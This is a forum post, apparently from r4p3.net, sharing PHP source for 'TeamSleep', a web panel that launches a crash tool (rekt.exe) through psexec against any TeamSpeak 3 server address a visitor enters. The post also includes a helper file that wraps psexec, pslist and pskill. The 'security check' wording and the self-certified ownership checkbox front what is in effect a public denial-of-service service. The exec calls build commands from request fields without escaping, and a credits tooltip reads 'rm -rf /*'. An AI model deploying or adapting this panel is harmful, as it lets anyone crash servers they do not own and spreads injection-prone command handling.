- Apr 25, 2015
- 1,844
- 2
- 2,197
- 327
Code:
<?php
if(isset($_POST['liable']))
{
require 'pstools.inc.php';
chdir(getcwd());
$remoteH = $_POST['remoteH'];
$remoteP = intval($_POST['remoteP']);
if(filter_var($remoteH, FILTER_VALIDATE_IP) && $remoteP>0 && $remoteP<65536)
{
if (isset($_SERVER["HTTP_CF_CONNECTING_IP"])) {
$_SERVER['REMOTE_ADDR'] = $_SERVER["HTTP_CF_CONNECTING_IP"];
}
if(isset($_SERVER['HTTP_X_SUCURI_CLIENTIP']))
{
$_SERVER["REMOTE_ADDR"] = $_SERVER['HTTP_X_SUCURI_CLIENTIP'];
}
$email = $_SESSION['passr'];
$myFile = "logs/checks.txt";
$fh = fopen($myFile, 'a') or die("can't open file");
$stringData = date("F j, Y, g:i a")." | CHECKER:".$_SERVER["REMOTE_ADDR"]. " & ".$email." | TARGET:".$remoteH.":".$remoteP."\r\n";
fwrite($fh, $stringData);
fclose($fh);
//exec("psexec.exe rekt.exe 127.0.0.1 9987");
//echo "<script>alert('Security check launched, standby.');</script>";
//exec("psexec.exe -d -accepteula rekt.exe $remoteH $remoteP 2>&1", $output);
//print_r(array_values($output));
//sleep(1);
//$pieces = explode("s ID ", $output[5]);
//$slayer = rtrim($pieces[1], ".");
//echo $slayer;
//shell_exec("taskkill /PID ".$slayer." /F /T");
exec("psexec.exe -d -accepteula C:/xampp/htdocs/rekt.exe $remoteH $remoteP 2>&1", $output);
sleep(5);
echo $output[4];
$pieces = explode("s ID ", $output[5]);
sleep(1);
$slayer = rtrim($pieces[1], ".");
echo $slayer;
sleep(1);
shell_exec("taskkill /PID ".$slayer." /F /T");
$finished = 1;
//PsKill($pieces[1]);
}else{
echo "<script>alert('Invalid IP address or port number.');</script>";
}
}
?>
<!DOCTYPE html>
<!--
TEMPLATE
Name: Zoo Planet
Version: 1.0
Created: 23 January 2014
AUTHOR
Design and code by: http://www.bootshape.com
Free stock photos by: http://www.bootshape.com
Read full license: http://www.bootshape.com/license.php
CREDITS
Background: http://subtlepatterns.com/ (extra_clean_paper)
Fonts: http://www.google.com/fonts (Actor, Duru_Sans)
SUPPORT
E-mail: [email protected]
Contact: http://www.bootshape.com/contact.php
-->
<html>
<head>
<title>TeamSleep</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<!-- Bootstrap -->
<link href="css/bootstrap.css" rel="stylesheet">
<!--Google Fonts-->
<link href='//fonts.googleapis.com/css?family=Belgrano|Courgette&subset=latin,latin-ext' rel='stylesheet' type='text/css'>
<!--Bootshape-->
<link href="css/bootshape.css" rel="stylesheet">
<!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
<!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
<!--[if lt IE 9]>
<script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
<script src="https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js"></script>
<![endif]-->
</head>
<body>
<!-- Navigation bar -->
<div class="navbar navbar-default navbar-fixed-top" role="navigation">
<div class="container">
<div class="navbar-header">
<button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a href="./" class="navbar-brand">TeamSleep</a>
</div>
<nav role="navigation" class="collapse navbar-collapse navbar-right">
<ul class="navbar-nav nav">
<li><a href="?logout=yes">Logout</a></li>
<li class="dropdown">
<a data-toggle="dropdown" href="#" class="dropdown-toggle">Credits <b class="caret"></b></a>
<ul class="dropdown-menu">
<li><a title="Aye!" href="#">Kaptan647</a></li>
<li><a title=";]" href="#">Derp</a></li>
<li><a title="What are you looking at?" href="#">Supervisor</a></li>
<li><a title="rm -rf /*" href="#">ehthe</a></li>
<li><a title="Shh, sleep." href="#">Asphyxia</a></li>
<li><a title="This cake tastes good." href="#">rofl</a></li>
<li class="divider"></li>
<li><a target="_blank" href="https://r4p3.net/">R4P3.NET</a></li>
</ul>
</li>
</ul>
</nav>
</div>
</div><!-- End Navigation bar -->
<!-- Slide gallery -->
<div class="jumbotron">
<div class="container">
<div class="col-xs-12">
</div>
</div><!-- End Slide gallery -->
</div>
<script>
function iAgree() {
document.getElementById('rocket').disabled = false;
}
function plsWait() {
document.getElementById('rocket').value = "Please wait, beginning check.";
}
</script>
<!-- Content -->
<div class="container">
<div class="">
<h3 class="">Do you like security?
<?php if(isset($_POST['agree'])){
echo "<font color='red'>Security check attempted.</font>";
}
?>
</h3>
<p>Great, we do too! That is why we are going to let you check your TeamSpeak 3 server security from this website.</p>
<p>Because this tool could be harmful, you will have to agree that you will only be checking your own TeamSpeak 3 server on the Internet.</p>
<p><b><u>You</u>, the website visitor accept any and all responsibility for misusing this tool.</b></p>
<form method="post" action="/">
<p>TeamSpeak 3 Server: <input size="15" type="text" name="remoteH"> : <input size="4" type="text" value="9987" name="remoteP"></p>
<p><label><input onclick="iAgree()" type="checkbox" name="liable" value="value"> I certify that I own the server listed above and understand that by clicking "submit", the server will be checked for security and may crash.</label>
<p><input type="submit" onclick="plsWait()" id="rocket" name="go" disabled="true" value="Let's go!"></p>
</form>
</div>
</div><!-- End Content -->
<!-- Footer -->
<div class="footer text-center">
<p>Security is like a kite, fly it high or crash low.</p>
</div><!-- End Footer -->
<!-- jQuery (necessary for Bootstrap's JavaScript plugins) -->
<script src="js/jquery.js"></script>
<!-- Include all compiled plugins (below), or include individual files as needed -->
<script src="js/bootstrap.min.js"></script>
<script src="js/bootshape.js"></script>
</body>
</html>
Code:
<?php
// pstools.inc.php
chdir(getcwd());
function PsExecute($command, $timeout = 60, $sleep = 2) {
// First, execute the process, get the process ID
$pid = PsExec($command);
if( $pid === false )
return false;
$cur = 0;
// Second, loop for $timeout seconds checking if process is running
while( $cur < $timeout ) {
sleep($sleep);
$cur += $sleep;
// If process is no longer running, return true;
if( !PsExists($pid) )
return true; // Process must have exited, success!
}
// If process is still running after timeout, kill the process and return false
PsKill($pid);
return false;
}
function PsExec($command) {
exec("psexec.exe -s -d $command 2>&1", $output);
while( list(,$row) = each($output) ) {
$found = stripos($row, 'with process ID ');
if( $found )
return substr($row, $found, strlen($row)-$found-strlen('with process ID ')-1); // chop off last character '.' from line
}
return false;
}
function PsExists($pid) {
exec("pslist.exe $pid 2>&1", $output);
while( list(,$row) = each($output) ) {
$found = stristr($row, "process $pid was not found");
if( $found !== false )
return false;
}
return true;
}
function PsKill($pid) {
exec("pskill.exe $pid", $output);
}
?>This is the source you need right here. Additionally there is a compiled C# utility you will need and the theme (CSS) files. No, this is probably not the neatest/pretties source although I did make it at like 4 AM without sleeping.
This is for Windows-based servers only. The C# executable kept hanging, so I had to terminate it after X seconds. *shrugs*
